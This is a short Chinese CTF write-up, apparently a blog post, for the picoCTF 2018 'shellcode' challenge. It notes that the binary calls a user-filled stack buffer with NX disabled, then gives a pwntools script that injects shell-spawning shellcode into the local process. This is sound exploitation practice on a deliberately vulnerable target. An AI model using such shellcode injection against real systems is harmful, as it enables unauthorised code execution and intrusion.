picoctf_2018_shellcode 1

1.checksec

在这里插入图片描述

2.ida

在这里插入图片描述
发现main函数不能编译,只能看汇编了,在main中还调用了vuln函数,然后我们查看一下可疑的vuln函数
在这里插入图片描述
然后我们就要知道参数a1是从哪传进来的,回到main函数vuln处
在这里插入图片描述
发现参数a1应是ebp+var_A0处的内容,也就是我们会在这个位置写入任意东西。
再往后看
在这里插入图片描述
发现它会直接call这个位置,而且该程序没有开NX,故我们可以直接发送shellcode,这样程序就会直接执行shellcode从而拿到shell

3.exp

from pwn import*
p=process('./30')#远程记得用remote()
context(os = 'linux',arch = 'i386',log_level = 'debug')
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值